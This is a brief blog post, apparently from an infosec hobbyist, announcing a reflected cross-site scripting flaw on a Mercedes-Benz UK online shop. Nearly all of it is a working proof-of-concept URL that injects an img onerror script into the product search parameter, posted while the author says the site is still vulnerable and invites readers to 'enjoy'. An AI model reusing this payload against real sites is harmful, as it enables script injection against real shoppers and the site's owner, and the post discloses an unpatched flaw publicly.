Cross Site Scripting in Mercedes-Benz



Hello friend today i am sharing my find in Mercedes-Benz shop site it is vulnerable to XSS and here is the POC :-

URL :-

http://shop.mercedes-benz.com/mbauk/ViewApplication-ProductSearch?keywords="><img+src=x+onerror=prompt(1);>


And it is still vulnerable to it :D

so enjoy
Share on Google Plus
Unknown

About Unknown

Hi , This is Osama Mahmood and i will share all my knowledge and skills on #infosec with you and hope you will enjoy learning new and unique things. follow me on twitter @OsamaMahmood007
    Blogger Comment
    Facebook Comment

0 comments:

Post a Comment